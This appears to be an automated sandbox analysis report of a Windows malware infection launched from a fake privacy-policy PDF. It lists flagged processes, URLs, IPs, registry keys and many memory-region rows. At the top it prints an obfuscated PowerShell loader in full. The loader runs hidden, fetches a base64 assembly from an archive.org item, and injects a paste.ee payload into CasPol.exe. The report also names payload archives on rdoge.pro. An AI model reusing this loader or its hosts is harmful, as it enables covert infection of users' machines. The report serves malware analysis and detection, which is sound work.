[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf"
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1724,i,13391688068409325489,10583059356098987935,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
There are 113 hidden processes, click here to show them.

URLs

Name
IP
Malicious
135.224.23.113
malicious
https://ia600100.us.arXj
unknown
https://rdoge.pro/nd/eneba_com_privacy_policy.pdfO
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://ia600100.us.arX
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://rdoge.pro/stc/wm_startup.zip
unknown
https://rdoge.pro/stc/pure_hnvc1.ziphttps://rdoge.pro/stc/wm_startup.ziphttps://rdoge.pro/stc/pure_h
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtZHo;NrXbase64Content
unknown
https://rdoge.pro/stc/pure_hnvc1.zipo4
unknown
https://github.com/Pester/Pester
unknown
https://rdoge.pro/nd/eneba_com_privacy_policy.pdf
unknown
https://rdoge.pro/stc/pure_hnvc2.zip
unknown
https://www.google.com
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
unknown
https://rdoge.pro/stc/pure_hnvc1.zip
unknown
https://paste.ee/d/82O7E/0
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://analytics.paste.ee;
unknown
https://rdoge.pro/nd/eneba_com_privacy_policy.pdfFailed
unknown
https://rdoge.pro/stc/pure_hnvc1.zipf4
unknown
https://ia600100.us.archive.org
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
https://rdoge.pro/stc/pure_hnvc2.zip049p
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://rdoge.pro/stc/wm_startup.zipf4
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
http://ia600100.us.archive.org
unknown
There are 35 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
127.0.0.1
unknown
unknown
malicious
135.224.23.113
unknown
United States
malicious
23.47.168.24
unknown
United States
143.198.209.174
unknown
United States
188.114.96.3
unknown
European Union
207.241.227.240
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileSource
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sFileAncestors
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uPageCount
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sAssetId
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
bisSharedFile
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uPageCount
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob
There are 30 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
 malicious
1AF314E0000
trusted library section
page read and write
 malicious
1AF2930E000
trusted library allocation
page read and write
 malicious
237B3BB2000
trusted library allocation
page read and write
 malicious
288CAC57000
heap
page read and write
22A5F22A000
heap
page read and write
B88C0BD000
stack
page read and write
2069466D000
heap
page read and write
288CCA7E000
heap
page read and write
21700083000
trusted library allocation
page read and write
28179FE000
stack
page read and write
745AB79000
stack
page read and write
20187A4D000
heap
page read and write
1D93BD68000
heap
page read and write
7FF7B3A80000
trusted library allocation
page read and write
21B5F7E9000
heap
page read and write
1AF29D0E000
trusted library allocation
page read and write
12751677000
heap
page read and write
237B3210000
trusted library allocation
page read and write
160828CF000
trusted library allocation
page read and write
1AF16FEA000
heap
page read and write
1060000
trusted library allocation
page read and write
1E07BF9E000
heap
page read and write
180C4C3C000
heap
page read and write
CAB292A000
stack
page read and write
55FE000
stack
page read and write
258D39FC000
heap
page read and write
BC55C7A000
stack
page read and write
2F6E2BF000
stack
page read and write
1EE94DE7000
heap
page read and write
4A371F9000
stack
page read and write
2276DED7000
heap
page read and write
1EE990E000
stack
page read and write
160828D2000
trusted library allocation
page read and write
946747E000
stack
page read and write
20694680000
heap
page read and write
23FDC2C2000
heap
page read and write
214A9C80000
heap
page read and write
D6C4EBA000
stack
page read and write
22A5F178000
heap
page read and write
202B24B4000
heap
page read and write
203DC9CC000
heap
page read and write
180C46F7000
heap
page read and write
2276DFED000
heap
page read and write
258D396E000
heap
page read and write
182D1798000
heap
page read and write
7FF7B37C0000
trusted library allocation
page read and write
1EE94DE7000
heap
page read and write
251FD3AA000
heap
page read and write
22A5F1AB000
heap
page read and write
1E07BD1B000
heap
page read and write
6B3EB7D000
stack
page read and write
23FDC33E000
heap
page read and write
22A5F082000
heap
page read and write
1FC80001000
trusted library allocation
page read and write
22A5F3FB000
heap
page read and write
251FD3C0000
heap
page read and write
212F3CED000
heap
page read and write
2069465B000
heap
page read and write
1364000
heap
page read and write
23FDC67D000
heap
page read and write
1608283B000
trusted library allocation
page read and write
1320000
heap
page read and write
206945F5000
heap
page read and write
196803EC000
trusted library allocation
page read and write
2069465F000
heap
page read and write
1E079BF0000
heap
page read and write
20187A30000
heap
page read and write
3FC0FFE000
stack
page read and write
AC9ADFF000
stack
page read and write
EDE000
heap
page read and write
1E07BCA9000
heap
page read and write
22A5F18D000
heap
page read and write
23FDC408000
heap
page read and write
7DF04FE000
stack
page read and write
1F0D369B000
trusted library allocation
page read and write
46207E000
stack
page read and write
7FF7B3AA0000
trusted library allocation
page read and write
21B615B1000
heap
page read and write
2C44597E000
heap
page read and write
1D93C130000
heap
page read and write
206945E6000
heap
page read and write
791C7FF000
stack
page read and write
20694655000
heap
page read and write
2069465D000
heap
page read and write
2159CD8C000
heap
page read and write
7FF7B384C000
trusted library allocation
page execute and read and write
22C26BED000
heap
page read and write
7FF7B38A6000
trusted library allocation
page read and write
258D34B0000
heap
page read and write
1AF16FE7000
heap
page read and write
180C46B6000
heap
page read and write
2276E280000
heap
page read and write
212F3CA0000
heap
page read and write
12EBB8B0000
heap
page read and write
7FF7B3A40000
trusted library allocation
page read and write
180C4E0B000
heap
page read and write
1C0CBE0C000
trusted library allocation
page read and write
7FF7B3AAC000
trusted library allocation
page read and write
23FDC5C0000
heap
page read and write
237B19F5000
heap
page read and write
2276C056000
heap
page read and write
7FF7B3AD0000
trusted library allocation
page read and write
D6C50BE000
stack
page read and write
203DC990000
heap
page read and write
1E07BF5F000
heap
page read and write
180C46F2000
heap
page read and write
1AF195BC000
trusted library allocation
page read and write
1F0D2C30000
heap
page readonly
C8072FF000
stack
page read and write
7FF7B3990000
trusted library allocation
page read and write
1E079CC6000
heap
page read and write
2159CF90000
heap
page read and write
23FDC67F000
heap
page read and write
2D8F000
trusted library allocation
page read and write
B88BFBC000
stack
page read and write
2159CCB8000
heap
page read and write
22C26CAD000
heap
page read and write
20187805000
heap
page read and write
1EE96CAD000
heap
page read and write
7FF7B3B10000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
214ABCC7000
trusted library allocation
page read and write
175E000
stack
page read and write
23FDC2C9000
heap
page read and write
21B6184E000
heap
page read and write
745AAFE000
stack
page read and write
180C46AA000
heap
page read and write
1AF16F9E000
heap
page read and write
7DF087E000
stack
page read and write
196805F1000
trusted library allocation
page read and write
20187915000
heap
page read and write
22A5F15D000
heap
page read and write
201876E7000
heap
page read and write
57DE000
stack
page read and write
137F000
heap
page read and write
377983E000
stack
page read and write
1F0D3893000
trusted library allocation
page read and write
20187A28000
heap
page read and write
1EC86141000
trusted library allocation
page read and write
203DF14A000
trusted library allocation
page read and write
20187902000
heap
page read and write
1FC80983000
trusted library allocation
page read and write
180C4E0B000
heap
page read and write
2069465F000
heap
page read and write
20185829000
heap
page read and write
22A5F3AE000
heap
page read and write
237B1944000
heap
page read and write
44D15FF000
stack
page read and write
2276DF17000
heap
page read and write
2F6DCFF000
stack
page read and write
237B3ACA000
trusted library allocation
page read and write
1D93BF30000
heap
page read and write
1AF28FE1000
trusted library allocation
page read and write
4501000
trusted library allocation
page read and write
212F3F4B000
heap
page read and write
201858BA000
heap
page read and write
22C26CCD000
heap
page read and write
20187A81000
heap
page read and write
23FDA41F000
heap
page read and write
1C5156F0000
heap
page read and write
127538F4000
trusted library allocation
page read and write
201876F3000
heap
page read and write
258D3928000
heap
page read and write
20187686000
heap
page read and write
F2568FE000
stack
page read and write
237B3C3C000
trusted library allocation
page read and write
21B5F7EE000
heap
page read and write
21700410000
trusted library allocation
page read and write
212F3F7C000
heap
page read and write
258D38FC000
heap
page read and write
20187A26000
heap
page read and write
288CCB6D000
heap
page read and write
16F0000
trusted library allocation
page read and write
251FB5FF000
heap
page read and write
1EE96CA1000
heap
page read and write
CAB2CFE000
stack
page read and write
20694693000
heap
page read and write
2276DF0F000
heap
page read and write
7FF7B3B50000
trusted library allocation
page read and write
1EE8DBB000
stack
page read and write
22A5D1D9000
heap
page read and write
D6C47CF000
stack
page read and write
2276E128000
heap
page read and write
160827A0000
heap
page execute and read and write
251FB5F6000
heap
page read and write
AC7FAE3000
stack
page read and write
201876FD000
heap
page read and write
59E0000
heap
page execute and read and write
21B5F7CC000
heap
page read and write
1AF17031000
heap
page read and write
1C0C9A30000
heap
page read and write
22C26BC2000
heap
page read and write
23FDC3C0000
heap
page read and write
1275386E000
trusted library allocation
page read and write
23FDC6C1000
heap
page read and write
2159CC0D000
heap
page read and write
201876AA000
heap
page read and write
B88B8E2000
stack
page read and write
1EE96E2C000
heap
page read and write
212F1CC6000
heap
page read and write
1D955E30000
heap
page read and write
173E47D000
stack
page read and write
1F0D131C000
heap
page read and write
160828C7000
trusted library allocation
page read and write
2159CB9A000
heap
page read and write
2159CF39000
heap
page read and write
251FD85E000
heap
page read and write
182D17D0000
heap
page read and write
1FC803CF000
trusted library allocation
page read and write
201876D2000
heap
page read and write
1D93DD76000
trusted library allocation
page read and write
1EE96CFD000
heap
page read and write
2276C067000
heap
page read and write
212F3F33000
heap
page read and write
22D528BC000
heap
page read and write
212F3BD3000
heap
page read and write
1609A7F3000
heap
page read and write
12EBB960000
heap
page read and write
1AF16FE5000
heap
page read and write
2159CBE2000
heap
page read and write
2159CC9C000
heap
page read and write
2C446406000
trusted library allocation
page read and write
21B5F74F000
heap
page read and write
2159CD8A000
heap
page read and write
1AF16FA7000
heap
page read and write
1AF16F69000
heap
page read and write
1EE83CF000
stack
page read and write
3FC0CFE000
stack
page read and write
7FF7B3B20000
trusted library allocation
page read and write
1D93D780000
trusted library allocation
page read and write
2159CBD7000
heap
page read and write
212F3F9D000
heap
page read and write
1EC82C00000
heap
page read and write
7FF7B3981000
trusted library allocation
page read and write
182D1869000
heap
page read and write
214ABCCD000
trusted library allocation
page read and write
2069462D000
heap
page read and write
10A0000
heap
page read and write
22A5F09F000
heap
page read and write
23FDC6C0000
heap
page read and write
180C4DFF000
heap
page read and write
237B3C59000
trusted library allocation
page read and write
180C471E000
heap
page read and write
7FF7B381C000
trusted library allocation
page execute and read and write
7FF7B3A50000
trusted library allocation
page read and write
182D17C8000
heap
page read and write
180C4D41000
heap
page read and write
180C4B8D000
heap
page read and write
2159CB9B000
heap
page read and write
1EE96E21000
heap
page read and write
7FF7B37DD000
trusted library allocation
page execute and read and write
214A9C9E000
heap
page read and write
1D956087000
heap
page read and write
1AF31187000
heap
page read and write
22C26CDF000
heap
page read and write
212F1F20000
heap
page read and write
22A5F40B000
heap
page read and write
214A9C40000
trusted library allocation
page read and write
12EBD516000
heap
page read and write
AC0043E000
stack
page read and write
288CABBF000
heap
page read and write
203DEF6A000
trusted library allocation
page read and write
182D17A3000
heap
page read and write
180C46A3000
heap
page read and write
1D955DF0000
heap
page execute and read and write
EEE127C000
stack
page read and write
21710031000
trusted library allocation
page read and write
1C515912000
trusted library allocation
page read and write
22A5F188000
heap
page read and write
251FD4AC000
heap
page read and write
1D93BDA5000
heap
page read and write
1EE96CD8000
heap
page read and write
180C4B4C000
heap
page read and write
203DED3D000
trusted library allocation
page read and write
180C4B85000
heap
page read and write
180C4B41000
heap
page read and write
E10000
trusted library allocation
page read and write
20694680000
heap
page read and write
21B61731000
heap
page read and write
22C26BE7000
heap
page read and write
12753473000
trusted library allocation
page read and write
22A5F056000
heap
page read and write
212F3E57000
heap
page read and write
288CCB7C000
heap
page read and write
237B31D0000
heap
page read and write
2276DEF2000
heap
page read and write
251FD3A9000
heap
page read and write
5039CFF000
stack
page read and write
127535AE000
trusted library allocation
page read and write
D9779FD000
stack
page read and write
1D93DDEA000
trusted library allocation
page read and write
20187A5E000
heap
page read and write
1EE8AB8000
stack
page read and write
CAB34FF000
stack
page read and write
745A58F000
stack
page read and write
1609AE40000
heap
page read and write
AC9B0FF000
stack
page read and write
6476AFC000
stack
page read and write
22A5F077000
heap
page read and write
21B6150F000
heap
page read and write
1E07BCCD000
heap
page read and write
7FF7B3810000
trusted library allocation
page read and write
288CCB5D000
heap
page read and write
23FDC32F000
heap
page read and write
7FF7B3AD0000
trusted library allocation
page read and write
21B615BD000
heap
page read and write
20187A4D000
heap
page read and write
2170078C000
trusted library allocation
page read and write
3FC05FA000
stack
page read and write
D977EFE000
stack
page read and write
202B0743000
heap
page read and write
251FD74F000
heap
page read and write
23FDC68E000
heap
page read and write
2276C061000
heap
page read and write
12751580000
heap
page read and write
1C5138B9000
heap
page read and write
1EE96F91000
heap
page read and write
1F0D1322000
heap
page read and write
2276E131000
heap
page read and write
258D3A18000
heap
page read and write
1AF1A99D000
trusted library allocation
page read and write
1608092B000
heap
page read and write
258D3933000
heap
page read and write
745A5CF000
stack
page read and write
22D52A90000
trusted library allocation
page read and write
1E07B7E7000
heap
page read and write
214A9CBC000
heap
page read and write
23FDC2C9000
heap
page read and write
1EE94CC0000
heap
page read and write
44D0F26000
stack
page read and write
1EE96BF7000
heap
page read and write
288CAB70000
heap
page read and write
3779938000
stack
page read and write
2276BFB5000
heap
page read and write
21B615AC000
heap
page read and write
20185800000
heap
page read and write
237B3928000
trusted library allocation
page read and write
1EE96C0C000
heap
page read and write
180C2C6B000
heap
page read and write
F2564FF000
stack
page read and write
7FF7B3970000
trusted library allocation
page read and write
202B2621000
trusted library allocation
page read and write
212F3E29000
heap
page read and write
D6C503E000
stack
page read and write
21B5F7F2000
heap
page read and write
127530F5000
heap
page read and write
16082B88000
trusted library allocation
page read and write
B88BE7E000
stack
page read and write
4A374BE000
stack
page read and write
1D93DDE7000
trusted library allocation
page read and write
6B3F07E000
stack
page read and write
22D52860000
heap
page read and write
173E93F000
stack
page read and write
1C0CBEFD000
trusted library allocation
page read and write
258D3A4D000
heap
page read and write
2069465F000
heap
page read and write
2069467F000
heap
page read and write
1EE96F73000
heap
page read and write
7FF7B3AA0000
trusted library allocation
page read and write
182D18E8000
heap
page read and write
16B0000
trusted library allocation
page read and write
288CCA63000
heap
page read and write
251FD733000
heap
page read and write
21B61748000
heap
page read and write
7FF7B37FD000
trusted library allocation
page execute and read and write
160827F0000
trusted library allocation
page read and write
22C26CBD000
heap
page read and write
1E07BCFD000
heap
page read and write
288CC5C0000
heap
page read and write
7FF7B37C4000
trusted library allocation
page read and write
251FD75E000
heap
page read and write
182D1871000
heap
page read and write
7FF7B384C000
trusted library allocation
page execute and read and write
180C46A2000
heap
page read and write
2F6DC73000
stack
page read and write
D9775CE000
stack
page read and write
BC5597D000
stack
page read and write
258D3A6C000
heap
page read and write
258D38F8000
heap
page read and write
20694693000
heap
page read and write
7FF681BFD000
unkown
page write copy
217003E9000
trusted library allocation
page read and write
2276DEA2000
heap
page read and write
1F0D1328000
heap
page read and write
23FDA408000
heap
page read and write
1EE96F79000
heap
page read and write
258D3935000
heap
page read and write
22A5F430000
heap
page read and write
7FF7B3A00000
trusted library allocation
page read and write
1E07BD9A000
heap
page read and write
217016B6000
trusted library allocation
page read and write
1D955E64000
heap
page read and write
521E000
stack
page read and write
1E07BF72000
heap
page read and write
258D3933000
heap
page read and write
BBB683B000
stack
page read and write
7FF7B3800000
trusted library allocation
page read and write
217003ED000
trusted library allocation
page read and write
B88C13F000
stack
page read and write
2C4459B7000
heap
page read and write
212F3C14000
heap
page read and write
237B3240000
heap
page readonly
288CCA7E000
heap
page read and write
203DE860000
heap
page execute and read and write
160809EC000
heap
page read and write
203DE840000
heap
page read and write
214A9CDF000
heap
page read and write
21B618A0000
heap
page read and write
AC0053E000
stack
page read and write
288CCEBF000
heap
page read and write
23FDC2E6000
heap
page read and write
13B6000
heap
page read and write
1AF18840000
heap
page readonly
2C445E64000
trusted library allocation
page read and write
1C0CB4B6000
heap
page execute and read and write
C70000
heap
page read and write
214A9D07000
heap
page read and write
288CCDB2000
heap
page read and write
258D3A58000
heap
page read and write
258D396E000
heap
page read and write
212F1CBA000
heap
page read and write
22A5F13C000
heap
page read and write
203DEB73000
trusted library allocation
page read and write
7FF7B3AF0000
trusted library allocation
page read and write
214AB680000
heap
page read and write
1609A868000
heap
page read and write
288CCB83000
heap
page read and write
1E07BD9A000
heap
page read and write
12751675000
heap
page read and write
7FF7B3AB0000
trusted library allocation
page read and write
7FF7B3880000
trusted library allocation
page execute and read and write
2018583E000
heap
page read and write
5AEF000
stack
page read and write
2276E131000
heap
page read and write
EF1F3FE000
stack
page read and write
22A5D154000
heap
page read and write
182D18CD000
heap
page read and write
12EBDF11000
trusted library allocation
page read and write
12EBD8F7000
heap
page execute and read and write
2276DEE2000
heap
page read and write
953D1FE000
stack
page read and write
202B0791000
heap
page read and write
212F3BD3000
heap
page read and write
1EE96D1A000
heap
page read and write
258D3CAF000
heap
page read and write
22D5287E000
heap
page read and write
21B6183B000
heap
page read and write
E26000
trusted library allocation
page execute and read and write
1EE96BA2000
heap
page read and write
461D7E000
stack
page read and write
180C4D36000
heap
page read and write
20694693000
heap
page read and write
1E079C90000
heap
page read and write
7FF7B3992000
trusted library allocation
page read and write
206945B0000
heap
page read and write
2276E247000
heap
page read and write
22A5F072000
heap
page read and write
201877BD000
heap
page read and write
288CAC58000
heap
